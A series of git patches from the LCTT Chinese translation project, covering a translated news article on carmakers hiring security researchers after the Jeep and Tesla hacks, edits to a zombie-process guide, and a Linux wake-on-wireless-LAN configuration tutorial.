的研究使 Jeep 汽车的制造商菲亚特克莱斯勒(Fiat Chrysler)付出了巨大的代价,因为这个安全漏洞,菲亚特克莱斯勒被迫召回了 140 万辆汽车。 + +毫无疑问,后来通用汽车首席执行官玛丽·巴拉(Mary Barra)把网络安全作为公司的首要任务。现在,计算机网络安全领域的人才在汽车制造商和高科技公司推进的无人驾驶汽车项目中的需求量很大。 + +优步 、[特斯拉][11]、苹果和中国的滴滴一直在积极招聘像 Miller 先生和 Valasek 先生这样的白帽黑客,传统的网络安全公司和学术界也有这样的趋势。 + +去年,特斯拉挖走了苹果 iOS 操作系统的安全经理 Aaron Sigel。优步挖走了 Facebook 的白帽黑客 Chris Gates。Miller 先生在发现 Jeep 的漏洞后就职于优步,然后被滴滴挖走。计算机安全领域已经有数十名优秀的工程师加入无人驾驶汽车项目研究的行列。 + +Miller 先生说,他离开了优步的一部分原因是滴滴给了他更自由的工作空间。 + +Miller 星期六在 Twitter 上写道:“汽车制造商对待网络攻击的威胁似乎更加严肃,但我仍然希望有更大的透明度。” + +像许多大型科技公司一样,特斯拉和菲亚特克莱斯勒也开始给那些发现并提交漏洞的黑客们提供奖励。通用汽车公司也做了类似的事情,但批评人士认为通用汽车公司的计划与科技公司提供的计划相比诚意不足,迄今为止还收效甚微。 + +在 Miller 和 Valasek 发现 Jeep 漏洞的一年后,他们又向人们演示了所有其他可能危害乘客安全的方式,包括劫持车辆的速度控制系统,猛打方向盘或在高速行驶下拉动手刹——这一切都是由汽车外的电脑操作的。(在测试中使用的汽车最后掉进路边的沟渠,他们只能寻求当地拖车公司的帮助) + +虽然他们必须在 Jeep 车上才能做到这一切,但这也证明了入侵的可能性。 + +在 Jeep 被入侵之前,华盛顿大学和加利福尼亚大学圣地亚哥分校的安全研究人员第一个通过蓝牙远程控制轿车并控制其刹车。研究人员警告汽车公司:汽车联网程度越高,被入侵的可能性就越大。 + +2015年,安全研究人员们发现了入侵高度软件化的特斯拉 Model S 的途径。Rogers 先生和网络安全公司 Lookout 的首席技术官凯文·马哈菲(Kevin Mahaffey)找到了一种通过直接连接在汽车上的笔记本电脑控制特斯拉汽车的方法。 + +一年后,来自中国腾讯的一支团队做了更进一步的尝试。他们入侵了一辆行驶中的特斯拉 Model S 并控制了其刹车器。和 Jeep 不同,特斯拉可以通过远程安装补丁来修复安全漏洞,这使得黑客的远程入侵也变的可能。 + +以上所有的例子中,入侵者都是无恶意的白帽黑客或者安全研究人员。但是给无人驾驶汽车制造商的教训是惨重的。 + +黑客入侵汽车的动机是无穷的。在得知 Rogers 先生和 Mahaffey 先生对特斯拉 Model S 的研究之后,一位中国 app 开发者和他们联系、询问他们是否愿意分享或者出售他们发现的漏洞。(这位 app 开发者正在寻找后门,试图在特斯拉的仪表盘上偷偷安装 app) + +尽管犯罪分子们一直在积极开发、购买、使用能够破解汽车的关键通信数据的工具,但目前还没有证据能够表明犯罪分子们已经找到连接汽车的后门。 + +但随着越来越多的无人驾驶和半自动驾驶的汽车驶入公路,它们将成为更有价值的目标。安全专家警告道:无人驾驶汽车面临着更复杂、更多面的入侵风险,每一辆新无人驾驶汽车的加入,都使这个系统变得更复杂,而复杂性不可避免地带来脆弱性。 + +20年前,平均每辆汽车有100万行代码,通用汽车公司的2010雪佛兰Volt有大约1000万行代码——比一架F-35战斗机的代码还要多。 + +如今, 平均每辆汽车至少有1亿行代码。无人驾驶汽车公司预计不久以后它们将有2亿行代码。当你停下来考虑:平均每1000行代码有15到50个缺陷,那么潜在的可利用缺陷就会以很快的速度增加。 + +“计算机最大的安全威胁仅仅是数据被删除,但无人驾驶汽车一旦出现安全事故,失去的却是乘客的生命。”一家致力于解决汽车安全问题的以色列初创公司 Karamba Security 的联合创始人 David Barzilai 说。 + +安全专家说道:要想真正保障无人驾驶汽车的安全,汽车制造商必须想办法避免所有可能产生的漏洞——即使漏洞不可避免。其中最大的挑战,是汽车制造商和软件开发商们之间的缺乏合作经验。 + +网络安全公司 Lookout 的 Mahaffey 先生说:“新的革命已经出现,我们不能固步自封,应该寻求新的思维。我们需要像发明出安全气囊那样的人来解决安全漏洞,但我们现在还没有看到行业内有人做出改变。“ + +Mahaffey 先生说:”在这场无人驾驶汽车的竞争中,那些最注重软件的公司将会成为最后的赢家“ + +-------------------------------------------------------------------------------- + +via: https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html + +作者:[NICOLE PERLROTH ][a] +译者:[XiatianSummer](https://github.com/XiatianSummer) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.nytimes.com/by/nicole-perlroth +[1]:https://www.nytimes.com/2016/06/09/technology/software-as-weaponry-in-a-computer-connected-world.html +[2]:https://www.nytimes.com/2015/08/29/technology/uber-hires-two-engineers-who-showed-cars-could-be-hacked.html +[3]:https://www.nytimes.com/2015/08/11/opinion/zeynep-tufekci-why-smart-objects-may-be-a-dumb-idea.html +[4]:https://www.nytimes.com/by/nicole-perlroth +[5]:https://www.nytimes.com/column/bits +[6]:https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html?utm_source=wanqu.co&utm_campaign=Wanqu+Daily&utm_medium=website#story-continues-1 +[7]:http://www.nytimes.com/newsletters/sample/bits?pgtype=subscriptionspage&version=business&contentId=TU&eventName=sample&module=newsletter-sign-up +[8]:https://www.nytimes.com/privacy +[9]:https://www.nytimes.com/help/index.html +[10]:https://bits.blogs.nytimes.com/2015/07/21/security-researchers-find-a-way-to-hack-cars/ +[11]:http://www.nytimes.com/topic/company/tesla-motors-inc?inline=nyt-org +[12]:http://www.autosec.org/pubs/cars-usenixsec2011.pdf +[13]:http://autos.nytimes.com/2011/Chevrolet/Volt/238/4117/329463/researchOverview.aspx?inline=nyt-classifier +[14]:http://topics.nytimes.com/top/reference/timestopics/subjects/m/military_aircraft/f35_airplane/index.html?inline=nyt-classifier +[15]:https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html?utm_source=wanqu.co&utm_campaign=Wanqu+Daily&utm_medium=website#story-continues-3 From e8ed1a91ea826832151f14b90e481aa5f0d3bb3a Mon Sep 17 00:00:00 2001 From: XiatianSummer Date: Thu, 14 Dec 2017 19:07:04 +0800 Subject: [PATCH 0557/1627] Delete 20170607 Why Car Companies Are Hiring Computer Security Experts.md --- ...es Are Hiring Computer Security Experts.md | 91 ------------------- 1 file changed, 91 deletions(-) delete mode 100644 sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md diff --git a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md b/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md deleted file mode 100644 index ba5a9e2c2e..0000000000 --- a/sources/tech/20170607 Why Car Companies Are Hiring Computer Security Experts.md +++ /dev/null @@ -1,91 +0,0 @@ -为什么车企纷纷招聘计算机安全专家 -============================================================ - -Photo -![](https://static01.nyt.com/images/2017/06/08/business/08BITS-GURUS1/08BITS-GURUS1-superJumbo.jpg) -来自 CloudFlare 公司的网络安全专家 Marc Rogers(左)和来自 Lookout 的 Kevin Mahaffey 能够通过直接连接在汽车上的笔记本电脑控制特斯拉的进行许多操作。图为他们在 CloudFlare 的大厅里的的熔岩灯前的合影,这些熔岩灯被用来生成密匙。纽约时报 CreditChristie Hemm Klok 拍摄 - -大约在七年前,伊朗的数位顶级核科学家经历过一系列形式类似的暗杀:凶手的摩托车接近他们乘坐的汽车,把磁性炸弹吸附在汽车上,然后逃离并引爆炸弹。 - -安全专家们警告人们,再过 7 年,凶手们不再需要摩托车或磁性炸弹。他们所需要的只是一台笔记本电脑和发送给无人驾驶汽车的一段代码——让汽车坠桥、被货车撞扁或者在高速公路上突然抛锚。 - -汽车制造商眼中的无人驾驶汽车。在黑客眼中只是一台可以达到时速 100 公里的计算机。 - -网络安全公司CloudFlare的首席安全研究员马克·罗杰斯(Marc Rogers)说:“它们已经不再是汽车了。它们是装在车轮上的数据中心。从外界接收的每一条数据都可以作为黑客的攻击载体。“ - -两年前,两名“白帽”黑客——寻找系统漏洞并修复它们的研究员,而不是利用漏洞来犯罪的破坏者(Cracker)——成功地在数里之外用电脑获得了一辆 Jeep Cherokee 的控制权。他们控制汽车撞击一个放置在高速公路中央的假人(在场景设定中是一位紧张的记者),直接终止了假人的一生。 - -黑客 Chris Valasek 和 Charlie Miller(现在是 Uber 和滴滴的安全研究人员)发现了一条 [由 Jeep 娱乐系统通向仪表板的电路][10]。他们利用这条线路控制了车辆转向、刹车和变速——他们在高速公路上撞击假人所需的一切。 - -Miller 先生上周日在 Twitter 上写道:“汽车被黑客入侵成为头条新闻,但是人们要清楚,没有人的汽车被坏人入侵过。 这些只是研究人员的测试。” - -尽管如此,Miller 和 Valasek 的研究使 Jeep 汽车的制造商菲亚特克莱斯勒(Fiat Chrysler)付出了巨大的代价,因为这个安全漏洞,菲亚特克莱斯勒被迫召回了 140 万辆汽车。 - -毫无疑问,后来通用汽车首席执行官玛丽·巴拉(Mary Barra)把网络安全作为公司的首要任务。现在,计算机网络安全领域的人才在汽车制造商和高科技公司推进的无人驾驶汽车项目中的需求量很大。 - -优步 、[特斯拉][11]、苹果和中国的滴滴一直在积极招聘像 Miller 先生和 Valasek 先生这样的白帽黑客,传统的网络安全公司和学术界也有这样的趋势。 - -去年,特斯拉挖走了苹果 iOS 操作系统的安全经理 Aaron Sigel。优步挖走了 Facebook 的白帽黑客 Chris Gates。Miller 先生在发现 Jeep 的漏洞后就职于优步,然后被滴滴挖走。计算机安全领域已经有数十名优秀的工程师加入无人驾驶汽车项目研究的行列。 - -Miller 先生说,他离开了优步的一部分原因是滴滴给了他更自由的工作空间。 - -Miller 星期六在 Twitter 上写道:“汽车制造商对待网络攻击的威胁似乎更加严肃,但我仍然希望有更大的透明度。” - -像许多大型科技公司一样,特斯拉和菲亚特克莱斯勒也开始给那些发现并提交漏洞的黑客们提供奖励。通用汽车公司也做了类似的事情,但批评人士认为通用汽车公司的计划与科技公司提供的计划相比诚意不足,迄今为止还收效甚微。 - -在 Miller 和 Valasek 发现 Jeep 漏洞的一年后,他们又向人们演示了所有其他可能危害乘客安全的方式,包括劫持车辆的速度控制系统,猛打方向盘或在高速行驶下拉动手刹——这一切都是由汽车外的电脑操作的。(在测试中使用的汽车最后掉进路边的沟渠,他们只能寻求当地拖车公司的帮助) - -虽然他们必须在 Jeep 车上才能做到这一切,但这也证明了入侵的可能性。 - -在 Jeep 被入侵之前,华盛顿大学和加利福尼亚大学圣地亚哥分校的安全研究人员第一个通过蓝牙远程控制轿车并控制其刹车。研究人员警告汽车公司:汽车联网程度越高,被入侵的可能性就越大。 - -2015年,安全研究人员们发现了入侵高度软件化的特斯拉 Model S 的途径。Rogers 先生和网络安全公司 Lookout 的首席技术官凯文·马哈菲(Kevin Mahaffey)找到了一种通过直接连接在汽车上的笔记本电脑控制特斯拉汽车的方法。 - -一年后,来自中国腾讯的一支团队做了更进一步的尝试。他们入侵了一辆行驶中的特斯拉 Model S 并控制了其刹车器。和 Jeep 不同,特斯拉可以通过远程安装补丁来修复安全漏洞,这使得黑客的远程入侵也变的可能。 - -以上所有的例子中,入侵者都是无恶意的白帽黑客或者安全研究人员。但是给无人驾驶汽车制造商的教训是惨重的。 - -黑客入侵汽车的动机是无穷的。在得知 Rogers 先生和 Mahaffey 先生对特斯拉 Model S 的研究之后,一位中国 app 开发者和他们联系、询问他们是否愿意分享或者出售他们发现的漏洞。(这位 app 开发者正在寻找后门,试图在特斯拉的仪表盘上偷偷安装 app) - -尽管犯罪分子们一直在积极开发、购买、使用能够破解汽车的关键通信数据的工具,但目前还没有证据能够表明犯罪分子们已经找到连接汽车的后门。 - -但随着越来越多的无人驾驶和半自动驾驶的汽车驶入公路,它们将成为更有价值的目标。安全专家警告道:无人驾驶汽车面临着更复杂、更多面的入侵风险,每一辆新无人驾驶汽车的加入,都使这个系统变得更复杂,而复杂性不可避免地带来脆弱性。 - -20年前,平均每辆汽车有100万行代码,通用汽车公司的2010雪佛兰Volt有大约1000万行代码——比一架F-35战斗机的代码还要多。 - -如今, 平均每辆汽车至少有1亿行代码。无人驾驶汽车公司预计不久以后它们将有2亿行代码。当你停下来考虑:平均每1000行代码有15到50个缺陷,那么潜在的可利用缺陷就会以很快的速度增加。 - -“计算机最大的安全威胁仅仅是数据被删除,但无人驾驶汽车一旦出现安全事故,失去的却是乘客的生命。”一家致力于解决汽车安全问题的以色列初创公司 Karamba Security 的联合创始人 David Barzilai 说。 - -安全专家说道:要想真正保障无人驾驶汽车的安全,汽车制造商必须想办法避免所有可能产生的漏洞——即使漏洞不可避免。其中最大的挑战,是汽车制造商和软件开发商们之间的缺乏合作经验。 - -网络安全公司 Lookout 的 Mahaffey 先生说:“新的革命已经出现,我们不能固步自封,应该寻求新的思维。我们需要像发明出安全气囊那样的人来解决安全漏洞,但我们现在还没有看到行业内有人做出改变。“ - -Mahaffey 先生说:”在这场无人驾驶汽车的竞争中,那些最注重软件的公司将会成为最后的赢家“ - --------------------------------------------------------------------------------- - -via: https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html - -作者:[NICOLE PERLROTH ][a] -译者:[XiatianSummer](https://github.com/XiatianSummer) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.nytimes.com/by/nicole-perlroth -[1]:https://www.nytimes.com/2016/06/09/technology/software-as-weaponry-in-a-computer-connected-world.html -[2]:https://www.nytimes.com/2015/08/29/technology/uber-hires-two-engineers-who-showed-cars-could-be-hacked.html -[3]:https://www.nytimes.com/2015/08/11/opinion/zeynep-tufekci-why-smart-objects-may-be-a-dumb-idea.html -[4]:https://www.nytimes.com/by/nicole-perlroth -[5]:https://www.nytimes.com/column/bits -[6]:https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html?utm_source=wanqu.co&utm_campaign=Wanqu+Daily&utm_medium=website#story-continues-1 -[7]:http://www.nytimes.com/newsletters/sample/bits?pgtype=subscriptionspage&version=business&contentId=TU&eventName=sample&module=newsletter-sign-up -[8]:https://www.nytimes.com/privacy -[9]:https://www.nytimes.com/help/index.html -[10]:https://bits.blogs.nytimes.com/2015/07/21/security-researchers-find-a-way-to-hack-cars/ -[11]:http://www.nytimes.com/topic/company/tesla-motors-inc?inline=nyt-org -[12]:http://www.autosec.org/pubs/cars-usenixsec2011.pdf -[13]:http://autos.nytimes.com/2011/Chevrolet/Volt/238/4117/329463/researchOverview.aspx?inline=nyt-classifier -[14]:http://topics.nytimes.com/top/reference/timestopics/subjects/m/military_aircraft/f35_airplane/index.html?inline=nyt-classifier -[15]:https://www.nytimes.com/2017/06/07/technology/why-car-companies-are-hiring-computer-security-experts.html?utm_source=wanqu.co&utm_campaign=Wanqu+Daily&utm_medium=website#story-continues-3 From d18e60ed1943178fb0a65a2cb1c33f6929f6324f Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 14 Dec 2017 22:31:52 +0800 Subject: [PATCH 0558/1627] PRF&PUB:20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md @lujun9972 --- ...nd How To Find & Kill Zombie Processes-.md | 30 +++++++++---------- 1 file changed, 15 insertions(+), 15 deletions(-) rename {translated/tech => published}/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md (73%) diff --git a/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md b/published/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md similarity index 73% rename from translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md rename to published/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md index 72acbcf558..ac6cd64441 100644 --- a/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md +++ b/published/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md @@ -1,8 +1,9 @@ -什么是僵尸进程以及如何找到并杀掉僵尸进程? +什么是僵尸进程,如何找到并杀掉僵尸进程? ====== + [![What Are Zombie Processes And How To Find & Kill Zombie Processes?](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/what-are-the-zombie-processes_orig.jpg)][1] -如果你经常使用 Linux,你应该遇到这个术语 `僵尸进程`。 那么什么是僵尸进程? 它们是怎么产生的? 他们是否对系统有害? 我要怎样杀掉这些进程? 下面将会回答这些问题。 +如果你经常使用 Linux,你应该遇到这个术语“僵尸进程Zombie Processes”。 那么什么是僵尸进程? 它们是怎么产生的? 它们是否对系统有害? 我要怎样杀掉这些进程? 下面将会回答这些问题。 ### 什么是僵尸进程? @@ -14,25 +15,25 @@ 但是,有时候有些程序即使执行完了也依然留在进程表中。 -那么,这些完成了生命周期但却依然留在进程表中的进程,我们称之为 `僵尸进程`。 +那么,这些完成了生命周期但却依然留在进程表中的进程,我们称之为 “僵尸进程”。 -### 他们是如何产生的? +### 它们是如何产生的? -当你运行一个程序时,它会产生一个父进程以及很多子进程。 所有这些子进程都会消耗内核分配给他们的内存和 CPU 资源。 +当你运行一个程序时,它会产生一个父进程以及很多子进程。 所有这些子进程都会消耗内核分配给它们的内存和 CPU 资源。 -这些子进程完成执行后会发送一个 Exit 信号然后死掉。这个 Exit 信号需要被父进程所读取。父进程需要随后调用 `wait` 命令来读取子进程的退出状态并将子进程从进程表中移除。 +这些子进程完成执行后会发送一个 Exit 信号然后死掉。这个 Exit 信号需要被父进程所读取。父进程需要随后调用 `wait` 命令来读取子进程的退出状态,并将子进程从进程表中移除。 若父进程正确第读取了子进程的 Exit 信号,则子进程会从进程表中删掉。 但若父进程未能读取到子进程的 Exit 信号,则这个子进程虽然完成执行处于死亡的状态,但也不会从进程表中删掉。 -### 僵尸进程对系统有害吗 Are Zombie processes harmful to the System? +### 僵尸进程对系统有害吗? -**不会**。由于僵尸进程并不做任何事情, 不会使用任何资源也不会影响其他进程, 因此存在僵尸进程也没什么坏处。 不过由于进程表中的退出状态以及其他一些进程信息也是存储在内存中的,因此存在太多僵尸进程有时也会是一些问题。 +**不会**。由于僵尸进程并不做任何事情, 不会使用任何资源也不会影响其它进程, 因此存在僵尸进程也没什么坏处。 不过由于进程表中的退出状态以及其它一些进程信息也是存储在内存中的,因此存在太多僵尸进程有时也会是一些问题。 -**你可以想象成这样:** +**你可以想象成这样:** -“你是一家建筑公司的老板。你每天根据工人们的工作量来支付工资。 有一个工人每天来到施工现场,就坐在那里, 你不用付钱, 它也不做任何工作。 他只是每天都来然后呆坐在那,仅此而已!” +“你是一家建筑公司的老板。你每天根据工人们的工作量来支付工资。 有一个工人每天来到施工现场,就坐在那里, 你不用付钱, 他也不做任何工作。 他只是每天都来然后呆坐在那,仅此而已!” 这个工人就是僵尸进程的一个活生生的例子。**但是**, 如果你有很多僵尸工人, 你的建设工地就会很拥堵从而让那些正常的工人难以工作。 @@ -54,14 +55,13 @@ ps aux | grep Z kill -s SIGCHLD pid ``` -将这里的 pid 替换成父进程的 id,这样父进程就会删除所有以及完成并死掉的子进程了。 +将这里的 pid 替换成父进程的进程 id,这样父进程就会删除所有以及完成并死掉的子进程了。 -**你可以把它想象成:** +**你可以把它想象成:** "你在道路中间发现一具尸体,于是你联系了死者的家属,随后他们就会将尸体带离道路了。" -不过许多程序写的不是那么好,无法删掉这些子僵尸(否则你一开始也见不到这些僵尸了)。 因此确保删除子僵尸的唯一方法就是杀掉它们的父进程。 - +不过许多程序写的不是那么好,无法删掉这些子僵尸(否则你一开始也见不到这些僵尸了)。 因此确保删除子僵尸的唯一方法就是杀掉它们的父进程。 -------------------------------------------------------------------------------- @@ -69,7 +69,7 @@ via: http://www.linuxandubuntu.com/home/what-are-zombie-processes-and-how-to-fin 作者:[linuxandubuntu][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 4dc69f8e0eed0582dfa69914569eb1bea53897da Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 14 Dec 2017 23:14:37 +0800 Subject: [PATCH 0559/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2014=E6=97=A5=20=E6=98=9F=E6=9C=9F=E5=9B=9B=2023:14:3?= =?UTF-8?q?7=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ireless wake-on-lan for Linux WiFi card.md | 107 ---------------- ...ireless wake-on-lan for Linux WiFi card.md | 116 ++++++++++++++++++ 2 files changed, 116 insertions(+), 107 deletions(-) delete mode 100644 sources/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md create mode 100644 translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md diff --git a/sources/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md b/sources/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md deleted file mode 100644 index 59478471b8..0000000000 --- a/sources/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md +++ /dev/null @@ -1,107 +0,0 @@ -translating by lujun9972 -How to configure wireless wake-on-lan for Linux WiFi card -====== -[![linux-configire-wake-on-wireless-lan-wowlan][1]][1] -Wake on Wireless (WoWLAN or WoW) is a feature to allow the Linux system to go into a low-power state while the wireless NIC remains active and stay connected to an AP. This quick tutorial shows how to enable WoWLAN or WoW (wireless wake-on-lan) mode with a wifi card installed in a Linux based laptop or desktop computer. - -Please note that not all WiFi cards or Linux drivers support the WoWLAN feature. - -## Syntax - -You need to use the iw command to see or manipulate wireless devices and their configuration on a Linux based system. The syntax is: -``` -iw command -iw [options] command -``` - -## List all wireless devices and their capabilities - -Type the following command: -``` -$ iw list -$ iw list | more -$ iw dev` -``` -Sample outputs: -``` -phy#0 - Interface wlp3s0 - ifindex 3 - wdev 0x1 - addr 6c:88:14:ff:36:d0 - type managed - channel 149 (5745 MHz), width: 40 MHz, center1: 5755 MHz - txpower 15.00 dBm - -``` - -Please note down phy0. - -## Find out the current status of your wowlan - -Open the terminal app and type the following command to tind out wowlan status: -`$ iw phy0 wowlan show` -Sample outputs: -`WoWLAN is disabled` - -## How to enable wowlan - -The syntax is: -`sudo iw phy {phyname} wowlan enable {option}` -Where, - - 1. {phyname} - Use iw dev to get phy name. - 2. {option} - Can be any, disconnect, magic-packet and so on. - - - -For example, I am going to enable wowlan for phy0: -`$ sudo iw phy0 wowlan enable any` -OR -`$ sudo iw phy0 wowlan enable magic-packet disconnect` -Verify it: -`$ iw phy0 wowlan show` -Sample outputs: -``` -WoWLAN is enabled: - * wake up on disconnect - * wake up on magic packet - -``` - -## Test it - -Put your laptop in suspend or sleep mode and send ping request or magic packet from your nas server: -`$ sudo sh -c 'echo mem > /sys/power/state'` -Send ping request from your nas server using the [ping command][3] -`$ ping your-laptop-ip` -OR [send magic packet using wakeonlan command][4] : -`$ wakeonlan laptop-mac-address-here -$ etherwake MAC-Address-Here` - -## How do I disable WoWLAN? - -The syntax is: -`$ sudo phy {phyname} wowlan disable -$ sudo phy0 wowlan disable` - -For more info read the iw command man page: -`$ man iw -$ iw --help` - - --------------------------------------------------------------------------------- - -via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/ - -作者:[Vivek Gite][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://twitter.com/nixcraft -[1] https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg -[2] https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html -[3] //www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info) -[4] https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/ diff --git a/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md b/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md new file mode 100644 index 0000000000..a9b58edbd8 --- /dev/null +++ b/translated/tech/20171213 How to configure wireless wake-on-lan for Linux WiFi card.md @@ -0,0 +1,116 @@ +如何为 Linux 无线网卡配置无线唤醒功能 +====== +[![linux-configire-wake-on-wireless-lan-wowlan][1]][1] +无线唤醒 (WoWLAN or WoW) 允许 Linux 系统进入低耗电模式的情况下保持无线网卡处于激活状态依然与热点连接。这篇教程演示了如何在一台安装无线网卡的 Linux 笔记本或桌面电脑上启用 WoWLAN / WoW 模式。 + +请注意,不是所有的无线网卡和 Linux 驱动程序都支持 WoWLAN。 + +## 语法 + +在 Linux 系统上,你需要使用 iw 命令来查看和操作无线设备及其配置。 其 syntax 为: +``` +iw command +iw [options] command +``` + +## 列出所有的无线设备及其功能 + +输入下面命令: +``` +$ iw list +$ iw list | more +$ iw dev +``` +输出为: +``` +phy#0 + Interface wlp3s0 + ifindex 3 + wdev 0x1 + addr 6c:88:14:ff:36:d0 + type managed + channel 149 (5745 MHz),width: 40 MHz, center1: 5755 MHz + txpower 15.00 dBm + +``` + +请记下这个 phy0。 + +## 查看 wowlan 的当前状态 + +打开终端并输入下面命令来查看无线网络的状态: +``` +$ iw phy0 wowlan show +``` +输出为: +``` +WoWLAN is disabled +``` + +## 如何启用 wowlan + +启用的语法为: +`sudo iw phy {phyname} wowlan enable {option}` +其中, + + 1。{phyname} - 使用 iw dev 来获取 phy 的名字。 + 2。{option} - 可以是 any, disconnect, magic-packet 等。 + + + +比如,我想为 phy0 开启 wowlan: +`$ sudo iw phy0 wowlan enable any` +或者 +`$ sudo iw phy0 wowlan enable magic-packet disconnect` +检查一下: +`$ iw phy0 wowlan show` +结果为: +``` +WoWLAN is enabled: + * wake up on disconnect + * wake up on magic packet + +``` + +## 测试一下 + +将你的笔记本挂起或者进入休眠模式,然后从 NAS 服务器上发送 ping 请求或 magic packet: +`$ sudo sh -c 'echo mem > /sys/power/state'` +从 NAS 服务器上使用 [ping command][3] 发送 ping 请求 +`$ ping your-laptop-ip` +也可以 [使用 wakeonlan 命令发送 magic packet][4]: +``` +$ wakeonlan laptop-mac-address-here +$ etherwake MAC-Address-Here +``` + +## 如何禁用 WoWLAN? + +语法为: +``` +$ sudo phy {phyname} wowlan disable +$ sudo phy0 wowlan disable +``` + +更多信息请阅读 iw 命令的 man 页: +``` +$ man iw +$ iw --help +``` + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/configure-wireless-wake-on-lan-for-linux-wifi-wowlan-card/ + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://twitter.com/nixcraft +[1] https://www.cyberciti.biz/media/new/faq/2017/12/linux-configire-wake-on-wireless-lan-wowlan.jpg +[2] https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html +[3] //www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info) +[4] https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/ From e084f25f2bae861819d332b6d2e6044ff138ea26 Mon Sep 17 00:00:00 2001 From: liuyakun Date: Thu, 14 Dec 2017 23:46:57 +0800 Subject: [PATCH 0560/1627] =?UTF-8?q?=E3=80=90=E7=BF=BB=E8=AF=91=E4=B8=AD?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...170730 Complete “Beginners to PRO” guide for GIT commands.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md b/sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md index a290a8e1ca..a99a0aeed1 100644 --- a/sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md +++ b/sources/tech/20170730 Complete “Beginners to PRO” guide for GIT commands.md @@ -1,3 +1,5 @@ +translating by liuxinyu123 + Complete “Beginners to PRO” guide for GIT commands ====== In our [**earlier tutorial,**][1] we have learned to install git on our machines. In this tutorial, we will discuss how we can use git i.e. various commands that are used with git. So let's start,In our earlier tutorial, we have learned to install git on our machines. In this tutorial, we will discuss how we can use git i.e. various commands that are used with git. So let's start, From 6f416e98cf6204b97ffd5e3d5dd0a6c3039f46ff Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Fri, 15 Dec 2017 00:09:36 +0800 Subject: [PATCH 0561/1627] =?UTF-8?q?The=20One=20in=20Which=20I=20Call=20O?= =?UTF-8?q?ut=20Hacker=20News,=20=E6=A0=A1=E5=AF=B9=E5=AE=8C=E6=AF=95?= =?UTF-8?q?=EF=BC=8C=E6=A0=BC=E5=BC=8F=E9=9C=80=E8=A6=81=E5=86=8D=E6=A0=A1?= =?UTF-8?q?=E5=AF=B9=E6=9B=B4=E6=94=B9=E4=B8=80=E8=BE=B9.=20=E6=BA=90?= =?UTF-8?q?=E8=8B=B1=E6=96=87md=E6=96=87=E4=BB=B6=E4=B8=A2=E5=A4=B1?= =?UTF-8?q?=EF=BC=8C=E6=97=A0=E6=B3=95=E8=B0=83=E6=95=B4md=E5=BC=95?= =?UTF-8?q?=E7=94=A8=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 